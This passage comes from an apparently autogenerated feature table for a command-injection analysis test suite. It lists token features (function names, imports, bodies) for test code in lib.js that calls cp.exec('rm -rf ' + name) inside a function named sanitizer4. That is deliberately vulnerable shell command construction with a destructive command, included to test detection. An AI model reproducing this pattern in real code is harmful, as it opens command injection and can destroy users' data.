name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:6:543:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:6:543:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:6:543:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:6:543:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:6:543:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:11:543:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:23:543:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:23:543:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:23:543:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:23:543:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:23:543:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:23:543:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:6:545:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:6:545:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:6:545:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:6:545:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:6:545:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:11:545:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:23:545:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 